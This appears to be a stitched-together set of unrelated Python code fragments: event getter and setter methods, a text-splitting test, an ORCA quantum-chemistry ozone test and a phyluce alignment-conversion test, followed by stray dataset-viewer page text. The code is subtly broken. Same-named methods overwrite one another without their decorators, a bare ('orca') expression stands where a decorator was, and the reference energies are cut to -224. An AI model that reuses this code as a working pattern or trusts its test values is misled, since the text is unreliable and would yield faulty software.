    def drag(self, value: Any):
        self._config(value, js_type=False)
    def dragStart(self):
        return self._config_get(None)
    def dragStart(self, value: Any):
        self._config(value, js_type=False)
    def drop(self):
        return self._config_get(None)
    def drop(self, value: Any):
        self._config(value, js_type=False)
    def mouseOut(self):
        return self._config_get(None)
    def mouseOut(self, value: Any):
        self._config(value, js_type=False)
    def mouseOver(self):
        return self._config_get(None)
    def mouseOver(self, value: Any):
        self._config(value, js_type=False)
    def remove(self):
        return self._config_get(None)
    def remove(self, value: Any):
        self._config(value, js_type=False)
    def select(self):
        return self._config_get(None)
    def select(self, value: Any):
        self._config(value, js_type=False)
    def unselect(self):
        return self._config_get(None)
    def unselect(self, value: Any):
        self._config(value, js_type=False)
    def update(self):
        return self._config_get(None)
    def update(self, value: Any):
        self._config(value, js_type=False)
def test_result_lengths_within_slots():
    """Every chunk returned by ad_from_string must fit within its slot length."""
    text = 'some random text that will be split by different slot lengths'
    for base in range(10):
        # Slot widths scale with the loop index to cover several sizes.
        slots = [base * factor for factor in (1, 3, 5, 10)]
        chunks = ad_from_string(text, slots=slots)
        for chunk, slot in zip(chunks, slots):
            assert len(chunk) <= slot
# NOTE(review): the bare string expression below is a no-op — presumably the
# argument of a stripped decorator (e.g. @using("orca")); confirm against the
# original test module.
('orca')
def test_orca_stable():
    """Run a UHF/def2-SVP ozone calculation with and without ORCA's wavefunction
    stability analysis and check both energies against the same reference.

    Requires a working ORCA installation; not runnable standalone.
    """
    init_logging()
    geom = geom_loader('lib:ozone.xyz')
    orca_kwargs = {'keywords': 'UHF def2-SVP', 'pal': 1, 'mult': 1, 'charge': 0}
    calc = ORCA(**orca_kwargs)
    geom.set_calculator(calc)
    # First pass: plain SCF energy without stability analysis.
    unstable_energy = calc.get_energy(geom.atoms, geom.coords)['energy']
    assert (unstable_energy == pytest.approx((- 224.)))
    # Second pass: same geometry with stability analysis enabled.
    calc.do_stable = True
    stable_energy = calc.get_energy(geom.atoms, geom.coords)['energy']
    assert (stable_energy == pytest.approx((- 224.)))
def test_align_convert_align_mafft_fasta_to_phylip_relaxed(o_dir, e_dir, request):
    """Convert the mafft fasta alignments to phylip-relaxed via the CLI tool
    and compare every produced file to the expected fixtures.

    o_dir/e_dir are pytest fixtures for the output and expected directories.
    """
    program = 'bin/align/phyluce_align_convert_one_align_to_another'
    output = os.path.join(o_dir, 'mafft-fasta-to-phylip-relaxed')
    cmd = [os.path.join(request.config.rootdir, program), '--alignments', os.path.join(e_dir, 'mafft'), '--output', output, '--input-format', 'fasta', '--output-format', 'phylip-relaxed', '--cores', '1']
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    (stdout, stderr) = proc.communicate()
    # Fix: use the decoded stderr as the assertion message; the original
    # passed print(...), whose return value is always None (and printed
    # the message even when the assertion held).
    assert proc.returncode == 0, stderr.decode('utf-8')
    output_files = glob.glob(os.path.join(output, '*'))
    assert output_files, 'There are no output files'
    for output_file in output_files:
        name = os.path.basename(output_file)
        expected_file = os.path.join(e_dir, 'mafft-fasta-to-phylip-relaxed', name)
        # Fix: close both files deterministically instead of leaking handles.
        with open(output_file) as observed_f, open(expected_file) as expected_f:
            assert observed_f.read() == expected_f.read()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.